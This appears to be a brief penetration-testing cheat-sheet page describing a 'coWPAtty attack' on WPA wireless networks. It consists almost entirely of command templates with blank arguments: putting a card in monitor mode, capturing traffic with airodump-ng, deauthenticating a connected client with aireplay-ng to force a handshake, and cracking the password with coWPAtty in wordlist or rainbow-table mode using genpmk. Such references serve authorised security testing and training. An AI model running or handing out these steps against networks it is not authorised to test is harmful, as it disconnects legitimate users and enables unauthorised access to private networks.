cowpatty_attack
COWPATTY ATTACK
coWPAtty Attack
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start
Start an Airodump capture, filtering on the AP channel and BSSID, saving the file to disk:
airodump-ng -c --bssid -w
Deauthenticate a connected client to force it to complete the 4-way handshake:
aireplay-ng -0 1 -a -c
To crack the WPA password with coWPAtty in wordlist mode:
cowpatty -r -f -2 -s
To use rainbow table mode with coWPAtty, first generate the hashes:
genpmk -f -d -s
Run coWPAtty with the generated hashes to recover the WPA password:
cowpatty -r -d -2 -s
Last updated
Was this helpful?